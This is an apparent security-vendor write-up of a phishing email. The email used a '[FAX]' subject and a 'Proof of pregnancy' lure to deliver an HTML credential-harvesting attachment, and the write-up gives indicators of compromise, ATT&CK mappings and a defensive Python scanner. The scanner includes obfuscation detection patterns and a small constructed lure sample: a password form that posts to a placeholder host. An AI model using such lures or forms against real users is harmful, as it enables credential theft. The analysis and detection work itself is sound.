TL;DR A phishing email from a Gmail account used a fax notification pretext with the subject line '[FAX] 300564241' and a body containing only 'Proof of pregnancy' followed by 'Sent from my iPhone.' The 24KB HTML attachment passed SPF, DKIM, and DMARC authentication for gmail[.]com and was rated clean by every automated scanner. The gateway quarantined the message, but the attachment itself contained a client-side credential harvesting page designed to render locally in the recipient's browser. The curiosity-driven lure relied on the bizarre subject matter to compel the recipient to open the file.
Severity: Medium
Tags: Credential Harvesting, Social Engineering
MITRE ATT&CK: T1566.001 (Phishing: Spearphishing Attachment); T1204.002 (User Execution: Malicious File)

The subject line read "[FAX] 300564241." The body contained two lines: "Proof of pregnancy" and "Sent from my iPhone." An HTML attachment sat at the bottom of the message, 24,669 bytes, waiting to be opened.

It arrived from a Gmail address, morgancgooding@gmail[.]com, with full SPF, DKIM, and DMARC authentication. This was not a spoofed sender. Google's infrastructure confirmed the message was legitimately sent through Gmail. Every automated scanner that evaluated the attachment returned a clean verdict.

The curiosity factor was the entire weapon. The bizarre combination of a fax notification and a pregnancy reference created exactly the kind of cognitive dissonance that makes people click. That instinct to investigate is what social engineering exploits at scale.

The Attachment That Scanners Could Not Read

The HTML file, named a1f939ee-aacc-49c9-8488-8b0e537c0aac.html, carried an MD5 hash of 71c8586fc813ed173c905f09756b3364. At nearly 25KB, it was large enough to contain substantial obfuscated JavaScript and a full credential harvesting form.

HTML attachment phishing works because the payload executes locally in the recipient's browser, not on a remote server. There is no URL for a gateway to scan. There is no domain reputation to check. The file renders from the local filesystem, presenting a login form or data collection page that captures credentials and transmits them to an attacker-controlled endpoint.

In this case, the sandbox environment could not even extract the file's contents, returning a FileNotFoundError during automated analysis. When a scanner cannot inspect a file, it typically fails open and returns a clean verdict. The attachment passed every gate.
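A defender-side triage check for this class of attachment, added here as an example and not part of the IRONSCALES post: it parses an HTML attachment for a password field, a form that posts to an absolute URL, and inline obfuscation primitives, and it treats anything it cannot decode or parse as "unscannable" rather than clean, which is the fail-closed behaviour the sandbox above lacked. The indicator regex, the verdict rule and the sample lure are assumptions constructed for this example, not vendor detection logic.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Obfuscation primitives common in HTML lures (an assumption for this example).
OBFUSCATION_RE = re.compile(r"\b(atob|unescape|eval|String\.fromCharCode|document\.write)\s*\(")

class _FormScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions, self.password_inputs, self.scripts = [], 0, []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def analyze_html_attachment(data: bytes) -> dict:
    """Fail closed: content that cannot be decoded or parsed is 'unscannable', never 'clean'."""
    try:
        scanner = _FormScanner()
        scanner.feed(data.decode("utf-8"))
        scanner.close()
    except Exception:  # undecodable or malformed input
        return {"verdict": "unscannable", "indicators": ["parse_failure"]}
    indicators = []
    if scanner.password_inputs:
        indicators.append("password_form")
    # A file opened from disk has no origin; an absolute action URL ships the typed fields off-host.
    if any(urlparse(a).scheme in ("http", "https") for a in scanner.actions):
        indicators.append("external_form_action")
    if OBFUSCATION_RE.search("".join(scanner.scripts)):
        indicators.append("obfuscated_script")
    verdict = "suspicious" if "password_form" in indicators and len(indicators) > 1 else "clean"
    return {"verdict": verdict, "indicators": indicators}

# Constructed sample: a minimal lure of the kind described above (placeholder .invalid host).
LURE = (b'<form action="https://collector.example.invalid/submit"><input type="password" name="p">'
        b'</form><script>document.write(atob("ZmFrZQ=="));</script>')
```

Running `analyze_html_attachment(LURE)` yields a "suspicious" verdict with all three indicators; a plain notice with no form or script yields "clean", and undecodable bytes yield "unscannable".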

A Minimal Lure With Maximum Leverage

The email body contained no links, no corporate branding, no urgency language, and no instructions. The "Sent from my iPhone" signature is a stock iOS footer that adds a layer of casual legitimacy. The entire social engineering payload was compressed into three elements: a fax number in the subject, a provocative phrase in the body, and an HTML file that answered the question the recipient was already asking.

This is a credential harvesting technique that inverts the typical phishing model. Instead of building an elaborate pretext to convince the recipient the email is legitimate, the attacker built a pretext so strange that the recipient's curiosity overrides their caution.

Adaptive AI flagged the message based on first-time sender signals, the mismatch between the Gmail sending address and the fax notification pretext, and behavioral patterns associated with HTML attachment delivery. The gateway quarantined the message before the recipient could open the file.


Indicators of Compromise

Type | Indicator | Context
Sender Email | morgancgooding@gmail[.]com | Real or compromised Gmail account
Subject | [FAX] 300564241 | Fax notification pretext
Attachment | a1f939ee-aacc-49c9-8488-8b0e537c0aac.html | HTML credential harvesting file (24,669 bytes)
Attachment Hash (MD5) | 71c8586fc813ed173c905f09756b3364 | HTML file hash
Scanner Verdict | Clean | All automated scanners returned clean

MITRE ATT&CK Mapping

Technique | ID | Relevance
Phishing: Spearphishing Attachment | T1566.001 | HTML attachment delivering credential harvesting payload
User Execution: Malicious File | T1204.002 | Requires recipient to open HTML file in browser

Email Attack of the Day is a daily series from IRONSCALES spotlighting real phishing attacks caught by Adaptive AI and our community of 35,000+ security professionals. Each post breaks down a real attack: what it looked like, why it worked, and what to do about it.
